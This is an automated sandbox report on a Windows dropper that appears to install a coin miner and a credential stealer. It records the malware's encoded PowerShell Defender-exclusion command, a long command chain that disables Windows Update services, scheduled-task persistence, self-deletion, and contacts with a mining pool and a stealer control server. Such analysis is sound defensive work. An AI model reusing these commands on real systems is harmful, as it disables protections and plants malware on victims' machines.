Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 31, 2022, 10:04 a.m.	Aug. 31, 2022, 10:06 a.m.

Size	5.5MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`a85d7d886197d00f694f2ad8e7aa5b32`
SHA256	`80930071626aa46a7ef7ebd2b285d203ebe554ea11d0799bf0395f6cb823a00a`
CRC32	`F1606F6C`
ssdeep	`98304:juWAuvKS7/fn+k45KJq7UX39Yn51g2MOw29TxmWZ3ElF68JlrcbYrCFmmO+:jkS7/fn25gH9oTw2RxxJElIglDrYt`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library

setup.exe "C:\Users\test22\AppData\Local\Temp\setup.exe"
2796
- 76587423657325823.exe "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe"
  2908
  - AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    145512
- SIJPFdhsui3sdfSF.exe "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
  2972
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbQB2ACMAPgAgAEAAKAAgADwAIwBpAGIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEAZQBnACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAHYAawB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAegAjAD4A"
    145652
  - cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    145888
    - sc.exe sc stop UsoSvc
      145948
    - sc.exe sc stop WaaSMedicSvc
      145996
    - sc.exe sc stop wuauserv
      146044
    - sc.exe sc stop bits
      146092
    - sc.exe sc stop dosvc
      146140
    - reg.exe reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
      146188
    - reg.exe reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
      146232
    - reg.exe reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
      146284
    - reg.exe reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
      146400
    - reg.exe reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
      3040
    - takeown.exe takeown /f C:\Windows\System32\WaaSMedicSvc.dll
      2128
    - icacls.exe icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
      2188
    - reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
      2584
    - reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
      2712
    - reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
      2936
    - reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
      3096
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      3152
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      3236
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      3344
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      3472
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      3548
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      3616
    - schtasks.exe SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      3704
  - cmd.exe "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    145540
    - powercfg.exe powercfg /x -hibernate-timeout-ac 0
      2068
    - powercfg.exe powercfg /x -hibernate-timeout-dc 0
      2120
    - powercfg.exe powercfg /x -standby-timeout-ac 0
      2236
    - powercfg.exe powercfg /x -standby-timeout-dc 0
      2296
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
    2428
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
      2460
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsAutHost"
    2776
    - schtasks.exe schtasks /run /tn "WindowsAutHost"
      2864
  - cmd.exe "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
    3320
    - choice.exe choice /C Y /N /D Y /T 3
      3424

Name	Response	Post-Analysis Lookup
pool.hashvault.pro	A 131.153.76.130 A 125.253.92.50	131.153.76.130

IP Address	Status	Action
125.253.92.50	Active	Moloch
164.124.101.2	Active	Moloch
95.142.46.35	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:55871 -> 164.124.101.2:53	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	Crypto Currency Mining Activity Detected
TCP 192.168.56.101:49169 -> 95.142.46.35:6666	2031198	ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil	Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 125.253.92.50:80	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (16 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 31, 2022, 9:57 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 31, 2022, 9:56 a.m.			0	0
IsDebuggerPresent Aug. 31, 2022, 9:56 a.m.			0	0
IsDebuggerPresent Aug. 31, 2022, 9:57 a.m.			0	0
IsDebuggerPresent Aug. 31, 2022, 9:57 a.m.			0	0
IsDebuggerPresent Aug. 31, 2022, 9:57 a.m.			0	0
IsDebuggerPresent Aug. 31, 2022, 9:57 a.m.			0	0
IsDebuggerPresent Aug. 31, 2022, 9:57 a.m.			0	0

Command line console output was observed (36 events)

Time & API	Arguments	Status	Return
WriteConsoleA Aug. 31, 2022, 10:04 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 31, 2022, 10:04 a.m.	buffer: bqertcwmktknxkjlernkjqvnwkjjx console_handle: 0x00000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: The system cannot find the file specified. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: [SC] ControlService FAILED 1062: The service has not been started. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: [SC] ControlService FAILED 1062: The service has not been started. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: Delete request is partially completed. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: The system cannot find the file specified. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: C:\Windows\System32\LogFiles\WMI\RtBackup\* console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: Access is denied. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: Successfully processed 0 files; Failed processing 1 files console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: SUCCESS: The scheduled task "WindowsAutHost" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: SUCCESS: Attempted to run the scheduled task "WindowsAutHost". console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: The specified task name "\Microsoft\Windows\WindowsUpdate\Automatic App Update" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: The specified task name "\Microsoft\Windows\WindowsUpdate\Scheduled Start" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: The specified task name "\Microsoft\Windows\WindowsUpdate\sih" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: Y console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: The specified task name "\Microsoft\Windows\WindowsUpdate\sihboot" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: The specified task name "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: The specified task name "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 31, 2022, 9:57 a.m.	buffer: ERROR: The specified task name "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" does not exist in the system. console_handle: 0x000000000000000b	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000342ab0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd43bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd43bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd43df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd43df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd43df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd442c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd442c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd442c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd442c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd442c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd442c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd442c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd442c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd438b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44410 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd6ad90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd6ad90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd6ae70 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd6ae70 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd6b8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd6b8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd6bb90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd6bb90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44020 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44020 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44020 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 31, 2022, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001bd44020 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 31, 2022, 9:56 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.didat

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 240 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 31, 2022, 10:04 a.m.	process_identifier: 2796 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 10:04 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054b000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 10:04 a.m.	process_identifier: 2908 region_size: 663552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00840000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000a90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef473b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002570000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2022, 9:56 a.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
